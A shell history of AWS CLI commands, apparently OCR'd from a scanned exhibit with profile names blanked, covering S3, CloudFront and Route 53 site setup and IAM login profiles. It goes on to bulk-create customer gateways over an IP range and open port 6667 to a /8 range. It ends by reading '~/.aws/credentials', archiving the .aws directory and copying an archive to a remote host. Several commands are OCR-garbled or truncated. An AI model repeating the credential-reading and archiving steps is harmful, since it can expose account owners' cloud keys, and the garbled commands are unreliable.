                               describe-instances --region us-east-1
8825 aws --profile
                                       :ribe-instances --region us-east-1
8826 aws --profile
                                       create-hosted-zone --name paigeat.info
 8827 aws --profile
                                       create-hosted-zone --name paigeat.info --caller-reference
PAIGEATINFO
8828 aws --profile
                                      list-buckets
8829 aws --profile
                                      create-bucket --bucket default
8830 aws --profile
                                      create-bucket --bucket
8831 aws --profile
                                      create-bucket --bucket paigeat.info
8832 aws --profile
                                      create-bucket --bucket paigeatinfo
                                      put-bucket-policy --bucket paigeatinfo --policy
8834 aws --profile
file:///paigeat.policy
8835 aws --profile
                                      put-bucket-policy --bucket paigeatinfo --policy
file:///home/erratic/paigeat.policy
8840 aws --profile
                                          create-distribution --origin-domain-name
paigeatinfo.s3.amazonaws.com --distribution-config
file:///home/erratic/paigeat.info/cloudfrontdistribution.config
8841 aws --profile
                                           create-distribution --distribution-config
file:///home/erratic/paigeat.into/cloudtrontdistribution.config
                                change-resource-record-sets --hosted-zone-id
                                                                                       UDST --change-batch
8842 aws --profile
paigeat.bucket alias
8843 aws --profile
                                        change-resource-record-sets --hosted-zone-id
                                                                                               JDST
--change-batch paigeat.bucket alias
8844 aws --profile
                                        change-resource-record-sets --change-batch
file://paigeat.bucket alias
8845 aws --profile
                                       list-hosted-zones
8847 aws --profile
                                       change-resource-record-sets --generate-cli-skeleton
8849 aws --profile
                                        change-resource-record-sets --hosted-zone-id
                                                                                              UDST
--change-batch file://paigeat.bucket alias
9090 aws --profile
                                           list-distributions
9091 aws
9092 aws iam create-login-profile --generate-cli-skeleton > create-login-profile.json
                                    create-login-profile --cli-input-json file://create-login-profile.json
9094 aws --profile
9095 aws --profile
                                    get-caller-identity
9101 git submodule add https://github.com/paigeadelethompson/aws-lambda-blog.git
9106 aws --profile
                                               view-billing
9107 aws --profile
                                               view-billing --region us-east-1
9108 aws --profile
                                               list-operations
9109 aws --profile
                                              describe-organization
```

```
9153 cp ../aws scan/spool.sh .
9182 aws --profile
                                              list-operations --region us-east-1
9217 aws --profile
                                    create-customer-gateway --help
9218 seq 2 254 | xargs -i -t aws --profile
                                                           create-customer-gateway --public-ip
46.246.43.{} --type static
9219 seq 2 254 | xargs -i -t aws --profile
                                                           create-customer-gateway --public-ip
46.246.43.{} --type static --bgp-asn 65000
9220 seq 2 254 | xargs -i -t aws --profile
                                                           create-customer-gateway --public-ip
46.246.43.{} --type static --bgp-asn 65000 --region eu-north-1
9221 seq 2 254 | xargs -i -t aws --profile
                                                           create-customer-gateway --public-ip
46.246.43.{} --type ipsec.1 --bgp-asn 65000 --region eu-north-1
                                   describe-customer-gateways --region eu-north-1
9222 aws --profile
9223 aws --profile
                                   describe-customer-gateways --region eu-north-1 | jq '.CustomerGateways
1.[]'
9224 aws --profile
                                   describe-customer-gateways --region eu-north-1 | jq -r
'.CustomerGateways |.[] | .CustomerGatewayId'
9225 aws --profile
                                   describe-customer-gateways --region eu-north-1 | jq -r
'.CustomerGateways |.[] | .CustomerGatewayId' | parallel aws --profile
delete-customer-gateway --gateway-id {} --region eu-north-1
9226 aws --profile
                                   describe-customer-gateways --region eu-north-1 | jq -r
'.CustomerGateways |.[] | .CustomerGatewayId' | parallel aws --profile
delete-customer-gateway --customer-gateway-id {} --region eu-north-1
                                   create-customer-gateway --public-ip 46.246.43.83 --type ipsec.1
9227 aws --profile
--bgp-asn 65000 --region eu-north-1
9228 aws --profile
                                   create-customer-gateway --public-ip 46.246.43.50 --type ipsec.1
--bgp-asn 65000 --region eu-north-1
9229 aws --profile
                                    reate-customer-gateway --public-ip 46.246.43.15 --type ipsec.1
--bgp-asn 65000 --region eu-north-1
9294 aws --profile
                                                    7507/default .
                                   sync s3://
9295 cat ~/.aws/contig
9296 cat ~/.aws/credentials
9297 aws --profile
                          iam create-login-profile --cli-input-json file://create-login-profile.json
              get-caller-identity --profile
9298 aws
9561 aws --profile
                                    authorize-security-group-ingress --group-id sg-
                                                                                       10cb --protocol tcp
--port 6667 --cidr 1/2.0.0.0/8 --region eu-north-1
9965 cd aws scan
9966 scp new all.xz admin2-1:/dev/shm/aws/new all.xz
10005 tar -cvf aws.tar .aws
10007 history | grep aws
```